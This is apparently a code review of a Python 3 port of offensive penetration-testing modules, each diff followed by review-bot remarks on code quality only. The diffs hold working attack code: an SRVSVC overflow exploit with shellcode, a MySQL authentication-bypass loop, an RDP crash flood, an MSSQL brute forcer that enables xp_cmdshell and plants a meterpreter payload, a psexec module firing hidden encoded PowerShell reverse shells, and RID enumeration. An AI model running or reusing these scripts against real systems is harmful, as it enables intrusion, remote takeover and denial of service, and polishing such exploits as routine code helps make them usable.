self.__dce.bind(uuid.uuidtup_to_bin(('4b324fc8-1670-01d3-1278-5a47bf6ee188', '3.0')))
self.__dce.bind(uuid.uuidtup_to_bin(
('4b324fc8-1670-01d3-1278-5a47bf6ee188', '3.0')))
# Constructing Malicious Packet
self.__stub='\x01\x00\x00\x00'
self.__stub+='\xd6\x00\x00\x00\x00\x00\x00\x00\xd6\x00\x00\x00'
self.__stub+=shellcode
self.__stub+='\x41\x41\x41\x41\x41\x41\x41\x41'
self.__stub+='\x41\x41\x41\x41\x41\x41\x41\x41'
self.__stub+='\x41\x41\x41\x41\x41\x41\x41\x41'
self.__stub+='\x41\x41\x41\x41\x41\x41\x41\x41'
self.__stub+='\x41\x41\x41\x41\x41\x41\x41\x41'
self.__stub+='\x41\x41\x41\x41\x41\x41\x41\x41'
self.__stub+='\x41\x41\x41\x41\x41\x41\x41\x41'
self.__stub+='\x41\x41\x41\x41\x41\x41\x41\x41'
self.__stub+='\x00\x00\x00\x00'
self.__stub+='\x2f\x00\x00\x00\x00\x00\x00\x00\x2f\x00\x00\x00'
self.__stub+=payload
self.__stub+='\x00\x00\x00\x00'
self.__stub+='\x02\x00\x00\x00\x02\x00\x00\x00'
self.__stub+='\x00\x00\x00\x00\x02\x00\x00\x00'
self.__stub+='\x5c\x00\x00\x00\x01\x00\x00\x00'
self.__stub+='\x01\x00\x00\x00'
self.__stub = '\x01\x00\x00\x00'
self.__stub += '\xd6\x00\x00\x00\x00\x00\x00\x00\xd6\x00\x00\x00'
self.__stub += shellcode
self.__stub += '\x41\x41\x41\x41\x41\x41\x41\x41'
self.__stub += '\x41\x41\x41\x41\x41\x41\x41\x41'
self.__stub += '\x41\x41\x41\x41\x41\x41\x41\x41'
self.__stub += '\x41\x41\x41\x41\x41\x41\x41\x41'
self.__stub += '\x41\x41\x41\x41\x41\x41\x41\x41'
self.__stub += '\x41\x41\x41\x41\x41\x41\x41\x41'
self.__stub += '\x41\x41\x41\x41\x41\x41\x41\x41'
self.__stub += '\x41\x41\x41\x41\x41\x41\x41\x41'
self.__stub += '\x00\x00\x00\x00'
self.__stub += '\x2f\x00\x00\x00\x00\x00\x00\x00\x2f\x00\x00\x00'
self.__stub += payload
self.__stub += '\x00\x00\x00\x00'
self.__stub += '\x02\x00\x00\x00\x02\x00\x00\x00'
self.__stub += '\x00\x00\x00\x00\x02\x00\x00\x00'
self.__stub += '\x5c\x00\x00\x00\x01\x00\x00\x00'
self.__stub += '\x01\x00\x00\x00'
return
def run(self):
try:
self.__DCEPacket()
self.__dce.call(0x1f, self.__stub) #0x1f (or 31)- NetPathCanonicalize Operation
# 0x1f (or 31)- NetPathCanonicalize Operation
self.__dce.call(0x1f, self.__stub)
except:
print '[-] System appears not to be vulnerable. Sorry.'
print('[-] System appears not to be vulnerable. Sorry.')
try:
current = SRVSVC_Exploit(target, osver)
current.start()
except:
print '[-] Target does not appear vulnerable.'
print('[-] Target does not appear vulnerable.')
print "[!] If no errors were thrown. Try connecting to victim on 4444"
print("[!] If no errors were thrown. Try connecting to victim on 4444")
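Review bot: `except ImportError as _:` on L580 binds a name that is never used; plain `except ImportError:` is clearer. The bare `except:` blocks on L741 and L747 hide whatever actually failed: inside `__DCEPacket`, `self.__stub += payload` on L728 references a name `payload` that is not defined anywhere visible here (the module defines `payload_1`, `payload_2` and `osver`), so unless it is set in the lines outside the hunks the thread dies with `NameError` and L743 prints "not vulnerable" regardless of the target. Narrowing to `except Exception as exc:` and including `exc` in the message on L743 and L749 would make that distinction visible. `SRVSVC_Exploit` and the module body both extend outside the hunks.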


@ -11,7 +11,7 @@
#
import subprocess
print """
print("""
This has to be the easiest "exploit" ever. Seriously. Embarassed to submit this a little.
Title: MySQL Remote Root Authentication Bypass
@ -22,8 +22,9 @@ Original advisory here: seclists.org/oss-sec/2012/q2/493
Note, you will see a number of failed login attempts, after about 300, if it doesn't
work, then its not vulnerable.
"""
ipaddr = raw_input("Enter the IP address of the mysql server: ")
""")
ipaddr = input("Enter the IP address of the mysql server: ")
while 1:
subprocess.Popen("mysql --host=%s -u root mysql --password=blah" % (ipaddr), shell=True).wait()
subprocess.Popen("mysql --host=%s -u root mysql --password=blah" %
(ipaddr), shell=True).wait()
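Review bot: `"mysql --host=%s -u root mysql --password=blah" % (ipaddr)` on L771-772 interpolates the value typed at the prompt straight into a `shell=True` command, so any shell metacharacters in `ipaddr` are interpreted by the shell instead of being passed to `mysql`; `subprocess.Popen(["mysql", "--host=" + ipaddr, "-u", "root", "mysql", "--password=blah"]).wait()` hands it over as a single argument. The `while 1:` on L769 has no exit condition at all — neither success nor a connection error ends it — while the module text on L763-764 describes the outcome as decided after roughly 300 attempts, which suggests a bounded `for` loop. Passing `--password` on the command line also exposes it to every local user through the process list.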


@ -14,20 +14,21 @@
import socket
import sys
print "Microsoft Terminal Services / Remote Desktop Services - Denial of Service"
print("Microsoft Terminal Services / Remote Desktop Services - Denial of Service")
headpack = "030000130ee000000000000100080000000000".decode('hex')
dafuq = "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".decode('hex')
dafuq = "030001d602f0807f658201940401010401010101ff30190204000000000204000000020204000000000204000000010204000000000204000000010202ffff020400000002301902040000000102040000000102040000000102040000000102040000000002040000000102020420020400000002301c0202ffff0202fc170202ffff0204000000010204000000000204000000010202ffff02040000000204820133000500147c0001812a000800100001c00044756361811c01c0d800040008008002e00101ca03aa09040000ce0e000048004f005300540000000000000000000000000000000000000000000000000004000000000000000c0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001ca010000000000100007000100300030003000300030002d003000300030002d0030003000300030003000300030002d003000300030003000300000000000000000000000000000000000000000000000000004c00c000d0000000000000002c00c001b0000000000000003c02c0003000000726470647200000000008080636c6970726472000000a0c0726470736e640000000000c0".decode(
'hex')
dafree = "0300000802f08028".decode('hex')
trololo = headpack+dafuq+dafree
trololo = headpack + dafuq + dafree
#HOSTNYO = sys.argv[1]
HOSTNYO = raw_input("Enter the IP address to crash (remote desktop): ")
HOSTNYO = input("Enter the IP address to crash (remote desktop): ")
PORTNYO = 3389
for i in range(10240):
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((HOSTNYO,PORTNYO))
s.connect((HOSTNYO, PORTNYO))
s.send(trololo)
rec = s.recv(1024)
s.close()
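Review bot: The Python 3 conversion of this file is incomplete: `print` and `raw_input` now use the Python 3 forms, but the three `"...".decode('hex')` calls that build `headpack`, `dafuq` and `dafree` are a Python 2 `str` method that does not exist on Python 3 strings, so the module fails at import on Python 3, while on Python 2 `input()` now evaluates whatever the operator types as an expression. The same `raw_input`→`input` substitution under a Python 2 interpreter affects the mssql section (`input("mssql>")`, the powershell prompt) and the psexec section (the `setprompt` calls) below, and the rid_enum file in this same commit keeps a `#!/usr/bin/python` shebang, so it is unclear which interpreter the tree targets. Pick one: either keep `raw_input` until the port is complete, or finish it here with `bytes.fromhex("...")` in place of `"...".decode('hex')`.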


@ -31,12 +31,14 @@ except ImportError:
sys.path.append(definepath)
else:
print "[!] Impacket is not installed. This menu will not work."
print("[!] Impacket is not installed. This menu will not work.")
sys.exit()
#
# this is the brute forcer
#
def brute(ipaddr,username,port,wordlist):
def brute(ipaddr, username, port, wordlist):
# if ipaddr being passed is invalid
if ipaddr == "":
return False
@ -48,17 +50,17 @@ def brute(ipaddr,username,port,wordlist):
wordlist = "src/fasttrack/wordlist.txt"
# read in the file
password = file(wordlist, "r")
password = open(wordlist, "r")
for passwords in password:
passwords = passwords.rstrip()
# try actual password
try:
ipaddr = str(ipaddr)
print "Attempting to brute force " + bcolors.BOLD + ipaddr + bcolors.ENDC + " with username of " + bcolors.BOLD + username + bcolors.ENDC + " and password of " + bcolors.BOLD + passwords + bcolors.ENDC
print("Attempting to brute force " + bcolors.BOLD + ipaddr + bcolors.ENDC + " with username of " + bcolors.BOLD + username + bcolors.ENDC + " and password of " + bcolors.BOLD + passwords + bcolors.ENDC)
# connect to the sql server and attempt a password
if ":" in ipaddr:
if ":" in ipaddr:
#target_server = _mssql.connect(ipaddr, username, passwords)
ipaddr = ipaddr.split(":")
port = ipaddr[1]
@ -70,15 +72,16 @@ def brute(ipaddr,username,port,wordlist):
sql_server.connect()
#target_server = False
target_server = sql_server.login("master", username, passwords)
if target_server:
print_status("\nSuccessful login with username %s and password: %s" % (username, passwords))
print_status("\nSuccessful login with username %s and password: %s" % (
username, passwords))
counter = 1
break
# if login failed or unavailable server
except Exception, e:
pass
except Exception as e:
pass
# if we brute forced a machine
if counter == 1:
@ -89,50 +92,60 @@ def brute(ipaddr,username,port,wordlist):
# else we didnt and we need to return a false
else:
if ipaddr != '':
print_warning("Unable to guess the SQL password for %s with username of %s" % (ipaddr,username))
print_warning("Unable to guess the SQL password for %s with username of %s" % (
ipaddr, username))
return False
#
# this will deploy an already prestaged executable that reads in hexadecimal and back to binary
#
def deploy_hex2binary(ipaddr,port,username,password):
def deploy_hex2binary(ipaddr, port, username, password):
mssql = tds.MSSQL(ipaddr, int(port))
mssql.connect()
mssql.login("master", username, password)
print_status("Enabling the xp_cmdshell stored procedure...")
try:
mssql.sql_query("exec master.dbo.sp_configure 'show advanced options',1;RECONFIGURE;exec master.dbo.sp_configure 'xp_cmdshell', 1;RECONFIGURE;")
except: pass
mssql.sql_query(
"exec master.dbo.sp_configure 'show advanced options',1;RECONFIGURE;exec master.dbo.sp_configure 'xp_cmdshell', 1;RECONFIGURE;")
except:
pass
print_status("Checking if powershell is installed on the system...")
# just throw a simple command via powershell to get the output
mssql.sql_query("exec master..xp_cmdshell 'powershell -Version'")
bundle = str(capture(mssql.printRows))
# remove null byte terminators from capture output
bundle = bundle.replace("\\x00", "")
# search for parameter version - standard output for powershell -Version command
# search for parameter version - standard output for powershell -Version
# command
match = re.search("parameter version", bundle)
# if we have a match we have powershell installed
if match:
print_status("Powershell was detected on the remote system.")
option_ps = raw_input("Do you want to use powershell injection? [yes/no]:")
option_ps = input(
"Do you want to use powershell injection? [yes/no]:")
if option_ps.lower() == "" or option_ps == "y" or option_ps == "yes":
option = "1"
print_status("Powershell delivery selected. Boom!")
else: option = "2"
else:
option = "2"
# otherwise, fall back to the older version using debug conversion via hex
else:
print_status("Powershell not detected, attempting Windows debug method.")
print_status(
"Powershell not detected, attempting Windows debug method.")
option = "2"
# if we don't have powershell
if option == "2":
try: reload(src.core.payloadgen.create_payloads)
except: import src.core.payloadgen.create_payloads
try:
reload(src.core.payloadgen.create_payloads)
except:
import src.core.payloadgen.create_payloads
print_status("Connection established with SQL Server...")
print_status("Converting payload to hexadecimal...")
# if we are using a SET interactive shell payload then we need to make the path under web_clone versus ~./set
# if we are using a SET interactive shell payload then we need to make
# the path under web_clone versus ~./set
if os.path.isfile(setdir + "/set.payload"):
web_path = (setdir + "/web_clone/")
# then we are using metasploit
@ -142,84 +155,105 @@ def deploy_hex2binary(ipaddr,port,username,password):
# if it isn't there yet
if not os.path.isfile(setdir + "/1msf.exe"):
# move it then
subprocess.Popen("cp %s/msf.exe %s/1msf.exe" % (setdir, setdir), shell=True).wait()
subprocess.Popen("cp %s/1msf.exe %s/ 1> /dev/null 2> /dev/null" % (setdir,setdir), shell=True).wait()
subprocess.Popen("cp %s/msf2.exe %s/msf.exe 1> /dev/null 2> /dev/null" % (setdir,setdir), shell=True).wait()
fileopen = file("%s/1msf.exe" % (web_path), "rb")
subprocess.Popen("cp %s/msf.exe %s/1msf.exe" %
(setdir, setdir), shell=True).wait()
subprocess.Popen("cp %s/1msf.exe %s/ 1> /dev/null 2> /dev/null" %
(setdir, setdir), shell=True).wait()
subprocess.Popen("cp %s/msf2.exe %s/msf.exe 1> /dev/null 2> /dev/null" %
(setdir, setdir), shell=True).wait()
fileopen = open("%s/1msf.exe" % (web_path), "rb")
# read in the binary
data = fileopen.read()
# convert the binary to hex
data = binascii.hexlify(data)
# we write out binary out to a file
filewrite = file(setdir + "/payload.hex", "w")
filewrite = open(setdir + "/payload.hex", "w")
filewrite.write(data)
filewrite.close()
# if we are using metasploit, start the listener
if not os.path.isfile(setdir + "/set.payload"):
if operating_system == "posix":
try:reload(pexpect)
except: import pexpect
try:
reload(pexpect)
except:
import pexpect
print_status("Starting the Metasploit listener...")
msf_path = meta_path()
child2 = pexpect.spawn("%smsfconsole -r %s/meta_config\r\n\r\n" % (meta_path(),setdir))
child2 = pexpect.spawn(
"%smsfconsole -r %s/meta_config\r\n\r\n" % (meta_path(), setdir))
# random executable name
random_exe = generate_random_string(10,15)
random_exe = generate_random_string(10, 15)
#
# next we deploy our hex to binary if we selected option 1 (powershell)
#
if option == "1":
print_status("Using universal powershell x86 process downgrade attack..")
print_status(
"Using universal powershell x86 process downgrade attack..")
payload = "x86"
# specify ipaddress of reverse listener
ipaddr = grab_ipaddress()
update_options("IPADDR=" + ipaddr)
port = raw_input(setprompt(["29"], "Enter the port for the reverse [443]"))
if port == "": port = "443"
port = input(
setprompt(["29"], "Enter the port for the reverse [443]"))
if port == "":
port = "443"
update_options("PORT=" + port)
update_options("POWERSHELL_SOLO=ON")
print_status("Prepping the payload for delivery and injecting alphanumeric shellcode...")
filewrite = file(setdir + "/payload_options.shellcode", "w")
print_status(
"Prepping the payload for delivery and injecting alphanumeric shellcode...")
filewrite = open(setdir + "/payload_options.shellcode", "w")
# format needed for shellcode generation
filewrite.write("windows/meterpreter/reverse_tcp" + " " + port + ",")
filewrite.close()
try: reload(src.payloads.powershell.prep)
except: import src.payloads.powershell.prep
try:
reload(src.payloads.powershell.prep)
except:
import src.payloads.powershell.prep
# create the directory if it does not exist
if not os.path.isdir(setdir + "/reports/powershell"):
os.makedirs(setdir + "/reports/powershell")
x86 = file(setdir + "/x86.powershell", "r")
x86 = open(setdir + "/x86.powershell", "r")
x86 = x86.read()
x86 = "powershell -nop -win hidden -noni -enc " + x86
print_status("If you want the powershell commands and attack, they are exported to %s/reports/powershell/" % (setdir))
filewrite = file(setdir + "/reports/powershell/x86_powershell_injection.txt", "w")
print_status(
"If you want the powershell commands and attack, they are exported to %s/reports/powershell/" % (setdir))
filewrite = open(
setdir + "/reports/powershell/x86_powershell_injection.txt", "w")
filewrite.write(x86)
filewrite.close()
# if our payload is x86 based - need to prep msfconsole rc
# if our payload is x86 based - need to prep msfconsole rc
if payload == "x86":
powershell_command = x86
powershell_dir = setdir + "/reports/powershell/x86_powershell_injection.txt"
filewrite = file(setdir + "/reports/powershell/powershell.rc", "w")
filewrite.write("use multi/handler\nset payload windows/meterpreter/reverse_tcp\nset lport %s\nset LHOST 0.0.0.0\nexploit -j" % (port))
filewrite.close()
powershell_command = x86
powershell_dir = setdir + "/reports/powershell/x86_powershell_injection.txt"
filewrite = open(setdir + "/reports/powershell/powershell.rc", "w")
filewrite.write(
"use multi/handler\nset payload windows/meterpreter/reverse_tcp\nset lport %s\nset LHOST 0.0.0.0\nexploit -j" % (port))
filewrite.close()
# grab the metasploit path from config or smart detection
msf_path = meta_path()
if operating_system == "posix":
try: reload(pexpect)
except: import pexpect
print_status("Starting the Metasploit listener...")
child2 = pexpect.spawn("%smsfconsole -r %s/reports/powershell/powershell.rc" % (msf_path,setdir))
print_status("Waiting for the listener to start first before we continue forward...")
print_status("Be patient, Metaploit takes a little bit to start...")
child2.expect("Starting the payload handler", timeout=30000)
print_status("Metasploit started... Waiting a couple more seconds for listener to activate..")
time.sleep(5)
try:
reload(pexpect)
except:
import pexpect
print_status("Starting the Metasploit listener...")
child2 = pexpect.spawn(
"%smsfconsole -r %s/reports/powershell/powershell.rc" % (msf_path, setdir))
print_status(
"Waiting for the listener to start first before we continue forward...")
print_status(
"Be patient, Metaploit takes a little bit to start...")
child2.expect("Starting the payload handler", timeout=30000)
print_status(
"Metasploit started... Waiting a couple more seconds for listener to activate..")
time.sleep(5)
# assign random_exe command to the powershell command
random_exe = powershell_command
@ -227,20 +261,22 @@ def deploy_hex2binary(ipaddr,port,username,password):
#
# next we deploy our hex to binary if we selected option 2 (debug)
#
if option == "2":
# we selected hex to binary
fileopen = file("src/payloads/hex2binary.payload", "r")
fileopen = open("src/payloads/hex2binary.payload", "r")
# specify random filename for deployment
print_status("Deploying initial debug stager to the system.")
random_file = generate_random_string(10,15)
random_file = generate_random_string(10, 15)
for line in fileopen:
# remove bogus chars
line = line.rstrip()
# make it printer friendly to screen
print_line = line.replace("echo e", "")
print_status("Deploying stager payload (hex): " + bcolors.BOLD + str(print_line) + bcolors.ENDC)
mssql.sql_query("exec master..xp_cmdshell '%s>> %s'" % (line,random_file))
print_status("Deploying stager payload (hex): " +
bcolors.BOLD + str(print_line) + bcolors.ENDC)
mssql.sql_query("exec master..xp_cmdshell '%s>> %s'" %
(line, random_file))
print_status("Converting the stager to a binary...")
# here we convert it to a binary
mssql.sql_query("exec master..xp_cmdshell 'debug<%s'" % (random_file))
@ -249,19 +285,26 @@ def deploy_hex2binary(ipaddr,port,username,password):
mssql.sql_query("exec master..xp_cmdshell 'del %s'" % (random_file))
# here we start the conversion and execute the payload
print_status("Sending the main payload via to be converted back to a binary.")
print_status(
"Sending the main payload via to be converted back to a binary.")
# read in the file 900 bytes at a time
fileopen = file(setdir + "/payload.hex", "r")
fileopen = open(setdir + "/payload.hex", "r")
while fileopen:
data = fileopen.read(900).rstrip()
# if data is done then break out of loop because file is over
if data == "": break
print_status("Deploying payload to victim machine (hex): " + bcolors.BOLD + str(data) + bcolors.ENDC + "\n")
mssql.sql_query("exec master..xp_cmdshell 'echo %s>> %s'" % (data, random_exe))
print_status("Delivery complete. Converting hex back to binary format.")
if data == "":
break
print_status("Deploying payload to victim machine (hex): " +
bcolors.BOLD + str(data) + bcolors.ENDC + "\n")
mssql.sql_query(
"exec master..xp_cmdshell 'echo %s>> %s'" % (data, random_exe))
print_status(
"Delivery complete. Converting hex back to binary format.")
mssql.sql_query("exec master..xp_cmdshell 'rename MOO.bin %s.exe'" % (random_file))
mssql.sql_query("exec master..xp_cmdshell '%s %s'" % (random_file, random_exe))
mssql.sql_query(
"exec master..xp_cmdshell 'rename MOO.bin %s.exe'" % (random_file))
mssql.sql_query("exec master..xp_cmdshell '%s %s'" %
(random_file, random_exe))
# clean up the old files
print_status("Cleaning up old files..")
mssql.sql_query("exec master..xp_cmdshell 'del %s'" % (random_exe))
@ -269,11 +312,14 @@ def deploy_hex2binary(ipaddr,port,username,password):
# if we are using SET payload
if os.path.isfile(setdir + "/set.payload"):
print_status("Spawning seperate child process for listener...")
try: shutil.copyfile(setdir + "/web_clone/x", definepath)
except: pass
try:
shutil.copyfile(setdir + "/web_clone/x", definepath)
except:
pass
# start a threaded webserver in the background
subprocess.Popen("python src/html/fasttrack_http_server.py", shell=True)
subprocess.Popen(
"python src/html/fasttrack_http_server.py", shell=True)
# grab the port options
if check_options("PORT=") != 0:
@ -283,24 +329,27 @@ def deploy_hex2binary(ipaddr,port,username,password):
else:
port = "443"
# thread is needed here due to the connect not always terminating thread, it hangs if thread isnt specified
try: reload(thread)
except: import thread
# thread is needed here due to the connect not always terminating thread,
# it hangs if thread isnt specified
try:
reload(thread)
except:
import _thread
# execute the payload
# we append more commands if option 1 is used
if option == "1":
print_status("Triggering the powershell injection payload... ")
sql_command = ("exec master..xp_cmdshell '%s'" % (powershell_command))
#mssql.sql_query("exec master..xp_cmdshell '%s'" % (powershell_command))
thread.start_new_thread(mssql.sql_query, (sql_command,))
print_status("Triggering the powershell injection payload... ")
sql_command = ("exec master..xp_cmdshell '%s'" % (powershell_command))
#mssql.sql_query("exec master..xp_cmdshell '%s'" % (powershell_command))
_thread.start_new_thread(mssql.sql_query, (sql_command,))
# using the old method
if option == "2":
print_status("Triggering payload stager...")
sql_command = ("xp_cmdshell '%s'" % (random_exe))
# start thread of SQL command that executes payload
thread.start_new_thread(mssql.sql_query, (sql_command,))
_thread.start_new_thread(mssql.sql_query, (sql_command,))
time.sleep(1)
# if pexpect doesnt exit right then it freaks out
@ -311,14 +360,16 @@ def deploy_hex2binary(ipaddr,port,username,password):
child2.interact()
try:
os.remove("x")
except: pass
except: pass
except:
pass
except:
pass
#
# this will deploy an already prestaged executable that reads in hexadecimal and back to binary
#
def cmdshell(ipaddr,port,username,password,option):
def cmdshell(ipaddr, port, username, password, option):
# connect to SQL server
mssql = tds.MSSQL(ipaddr, int(port))
mssql.connect()
@ -326,19 +377,23 @@ def cmdshell(ipaddr,port,username,password,option):
print_status("Connection established with SQL Server...")
print_status("Attempting to re-enable xp_cmdshell if disabled...")
try:
mssql.sql_query("exec master.dbo.sp_configure 'show advanced options',1;RECONFIGURE;exec master.dbo.sp_configure 'xp_cmdshell', 1;RECONFIGURE;")
except Exception, e: pass
print_status("Enter your Windows Shell commands in the xp_cmdshell - prompt...")
mssql.sql_query(
"exec master.dbo.sp_configure 'show advanced options',1;RECONFIGURE;exec master.dbo.sp_configure 'xp_cmdshell', 1;RECONFIGURE;")
except Exception as e:
pass
print_status(
"Enter your Windows Shell commands in the xp_cmdshell - prompt...")
while 1:
# prompt mssql
cmd = raw_input("mssql>")
cmd = input("mssql>")
# if we want to exit
if cmd == "quit" or cmd == "exit": break
if cmd == "quit" or cmd == "exit":
break
# if the command isnt empty
if cmd != "":
# execute the command
mssql.sql_query("exec master..xp_cmdshell '%s'" % (cmd))
# print the rest of the data
mssql.printReplies()
mssql.colMeta[0]['TypeData'] = 80*2
mssql.colMeta[0]['TypeData'] = 80 * 2
mssql.printRows()
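Review bot: `data = binascii.hexlify(data)` returns `bytes` on Python 3, but the next lines open `payload.hex` in text mode (`filewrite = open(setdir + "/payload.hex", "w")`) and write it, which raises `TypeError`; the port swapped `file` for `open` without adjusting the value, and `data = binascii.hexlify(data).decode("ascii")` fixes it (the `1msf.exe`, `x86.powershell` and `hex2binary.payload` handles are also never closed, so `with open(...) as fileopen:` would be the cleaner form). The `try: reload(x) / except: import x` pattern used for `pexpect`, `src.core.payloadgen.create_payloads` and `src.payloads.powershell.prep` only works on Python 3 because `reload` is no longer a builtin and the bare `except:` hides that `NameError`; the `reload(thread)` / `import _thread` pair is worse, since `thread` is not imported anywhere visible and the name differs from the `_thread` that the two `start_new_thread` calls use, so the `try` branch can never succeed — `importlib.reload` with `except ImportError:` on one consistent module name states the intent. In `cmdshell`, `except Exception as e: pass` binds an unused `e` around the best-effort `sp_configure` call; drop the name or log the failure. `deploy_hex2binary` spans several hunks here, and `cmdshell` may continue past this one.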


@ -1,6 +1,6 @@
#############################################
#
# Main SET module for psexec
# Main SET module for psexec
#
#############################################
from src.core.setcore import *
@ -17,24 +17,34 @@ from src.core.setcore import *
# SMBSHARE C$ yes The name of a writeable share on the server
# SMBUser no The username to authenticate as
# THREADS 1 yes The number of concurrent threads
# WINPATH WINDOWS yes The name of the remote Windows directory
# WINPATH WINDOWS yes The name of the
# remote Windows directory
# msf auxiliary(psexec_command) >
# grab config options for stage encoding
stage_encoding = check_config("STAGE_ENCODING=").lower()
if stage_encoding == "off": stage_encoding = "false"
else: stage_encoding = "true"
if stage_encoding == "off":
stage_encoding = "false"
else:
stage_encoding = "true"
rhosts=raw_input(setprompt(["32"], "Enter the IP Address or range (RHOSTS) to connect to")) # rhosts
username=raw_input(setprompt(["32"], "Enter the username")) # username for domain/workgroup
password=raw_input(setprompt(["32"], "Enter the password or the hash")) # password for domain/workgroup
domain=raw_input(setprompt(["32"], "Enter the domain name (hit enter for logon locally)")) # domain name
threads=raw_input(setprompt(["32"], "How many threads do you want [enter for default]"))
rhosts = input(setprompt(
["32"], "Enter the IP Address or range (RHOSTS) to connect to")) # rhosts
# username for domain/workgroup
username = input(setprompt(["32"], "Enter the username"))
# password for domain/workgroup
password = input(setprompt(["32"], "Enter the password or the hash"))
domain = input(setprompt(
["32"], "Enter the domain name (hit enter for logon locally)")) # domain name
threads = input(
setprompt(["32"], "How many threads do you want [enter for default]"))
# if blank specify workgroup which is the default
if domain == "": domain = "WORKGROUP"
if domain == "":
domain = "WORKGROUP"
# set the threads
if threads == "": threads = "15"
if threads == "":
threads = "15"
payload = check_config("POWERSHELL_INJECT_PAYLOAD_X86=").lower()
@ -47,39 +57,47 @@ try:
# specify ipaddress of reverse listener
ipaddr = grab_ipaddress()
update_options("IPADDR=" + ipaddr)
port = raw_input(setprompt(["29"], "Enter the port for the reverse [443]"))
if port == "": port = "443"
port = input(setprompt(["29"], "Enter the port for the reverse [443]"))
if port == "":
port = "443"
update_options("PORT=" + port)
filewrite = file(setdir + "/payload_options.shellcode", "w")
# format needed for shellcode generation
filewrite.write(payload + " " + port + ",")
filewrite.close()
update_options("POWERSHELL_SOLO=ON")
print_status("Prepping the payload for delivery and injecting alphanumeric shellcode...")
try: reload(src.payloads.powershell.prep)
except: import src.payloads.powershell.prep
print_status(
"Prepping the payload for delivery and injecting alphanumeric shellcode...")
try:
reload(src.payloads.powershell.prep)
except:
import src.payloads.powershell.prep
# create the directory if it does not exist
if not os.path.isdir(setdir + "/reports/powershell"):
os.makedirs(setdir + "/reports/powershell")
os.makedirs(setdir + "/reports/powershell")
x86 = file(setdir + "/x86.powershell", "r")
x86 = x86.read()
x86 = "powershell -nop -win hidden -noni -enc " + x86
print_status("If you want the powershell commands and attack, they are exported to %s/reports/powershell/" % (setdir))
filewrite = file(setdir + "/reports/powershell/x86_powershell_injection.txt", "w")
print_status(
"If you want the powershell commands and attack, they are exported to %s/reports/powershell/" % (setdir))
filewrite = file(
setdir + "/reports/powershell/x86_powershell_injection.txt", "w")
filewrite.write(x86)
filewrite.close()
payload = "windows/meterpreter/reverse_tcp\n" # if we are using x86
command = x86 # assign powershell to command
payload = "windows/meterpreter/reverse_tcp\n" # if we are using x86
command = x86 # assign powershell to command
# write out our answer file for the powershell injection attack
filewrite = file(setdir + "/reports/powershell/powershell.rc", "w")
filewrite.write("use multi/handler\nset payload windows/meterpreter/reverse_tcp\nset LPORT %s\nset LHOST 0.0.0.0\nset ExitOnSession false\nexploit -j\nuse auxiliary/admin/smb/psexec_command\nset RHOSTS %s\nset SMBUser %s\nset SMBPass %s\nset SMBDomain %s\nset THREADS %s\nset COMMAND %s\nset EnableStageEncoding %s\nset ExitOnSession false\nexploit\n" % (port,rhosts,username,password,domain,threads,command, stage_encoding))
filewrite.write("use multi/handler\nset payload windows/meterpreter/reverse_tcp\nset LPORT %s\nset LHOST 0.0.0.0\nset ExitOnSession false\nexploit -j\nuse auxiliary/admin/smb/psexec_command\nset RHOSTS %s\nset SMBUser %s\nset SMBPass %s\nset SMBDomain %s\nset THREADS %s\nset COMMAND %s\nset EnableStageEncoding %s\nset ExitOnSession false\nexploit\n" %
(port, rhosts, username, password, domain, threads, command, stage_encoding))
filewrite.close()
# launch metasploit below
print_status("Launching Metasploit.. This may take a few seconds.")
subprocess.Popen("%smsfconsole -r %s/reports/powershell/powershell.rc" % (meta_path(),setdir), shell=True).wait()
subprocess.Popen("%smsfconsole -r %s/reports/powershell/powershell.rc" %
(meta_path(), setdir), shell=True).wait()
# handle exceptions
except Exception, e:
except Exception as e:
print_error("Something went wrong printing error: " + str(e))
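Review bot: The new side still calls the Python 2 builtin `file(...)` — in the reformatted `filewrite = file(` / `setdir + "/reports/powershell/x86_powershell_injection.txt", "w")` and in the surrounding `payload_options.shellcode`, `x86.powershell` and `powershell.rc` opens — while `raw_input` was changed to `input` in the same hunk and the mssql section of this commit converted every `file` to `open`. On Python 3 that is a `NameError` inside the `try`, caught by the `except Exception as e` here and reported only as "Something went wrong printing error: ...", so the failure is easy to misread as a Metasploit problem. Replace each `file(` with `open(` for consistency with the mssql section. The enclosing `try` starts before this hunk.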

168
src/fasttrack/rid_enum.py Executable file → Normal file

@ -1,8 +1,8 @@
#!/usr/bin/env python
#!/usr/bin/python
import subprocess
import os
import sys
#############################################################################################################
##########################################################################
#
# RID Enum
# RID Cycling Tool
@ -17,11 +17,11 @@ import sys
#
# Special thanks to Tom Steele for the pull request update and changes.
#
#############################################################################################################
##########################################################################
def usage():
print """
print("""
.______ __ _______ _______ .__ __. __ __ .___ ___.
| _ \ | | | \ | ____|| \ | | | | | | | \/ |
| |_) | | | | .--. | | |__ | \| | | | | | | \ / |
@ -41,23 +41,25 @@ automatically attempt to brute force the user accounts when its finished enumera
- RID_ENUM is open source and uses all standard python libraries minus python-pexpect. -
You can also specify an already dumped username file, it needs to be in the DOMAINNAME\USERNAME
You can also specify an already dumped username file, it needs to be in the DOMAINNAME\\USERNAME
format.
Example: ./rid_enum.py 192.168.1.50 500 50000 /root/dict.txt
Example: ./ridenum.py 192.168.1.50 500 50000 /root/dict.txt
Usage: ./rid_enum.py <server_ip> <start_rid> <end_rid> <optional_password_file> <optional_username_filename>
"""
Usage: ./ridenum.py <server_ip> <start_rid> <end_rid> <optional_password_file> <optional_username_filename>
""")
sys.exit()
# for nt-status-denied
denied = 0
# attempt to use lsa query first
def check_user_lsa(ip):
# pull the domain via lsaenum
proc = subprocess.Popen('rpcclient -U "" %s -N -c "lsaquery"' % ip, stdout=subprocess.PIPE,
stderr=subprocess.PIPE, shell=True)
shell=True)
stdout_value = proc.communicate()[0]
# if the user wasn't found, return a False
if not "Domain Sid" in stdout_value:
@ -66,6 +68,8 @@ def check_user_lsa(ip):
return stdout_value
# attempt to lookup an account via rpcclient
def check_user(ip, account):
proc = subprocess.Popen('rpcclient -U "" %s -N -c "lookupnames %s"' % (ip, account), stdout=subprocess.PIPE,
stderr=subprocess.PIPE, shell=True)
@ -80,7 +84,7 @@ def check_user(ip, account):
# helper function to break a list up into smaller lists
def chunk(l, n):
for i in range(0, len(l), n):
yield l[i:i+n]
yield l[i:i + n]
# this will do a conversion to find the account name based on rid
@ -101,7 +105,7 @@ def sids_to_names(ip, sid, start, stop):
stderr=subprocess.PIPE, shell=True)
stdout_value = proc.communicate()[0]
if "NT_STATUS_ACCESS_DENIED" in stdout_value:
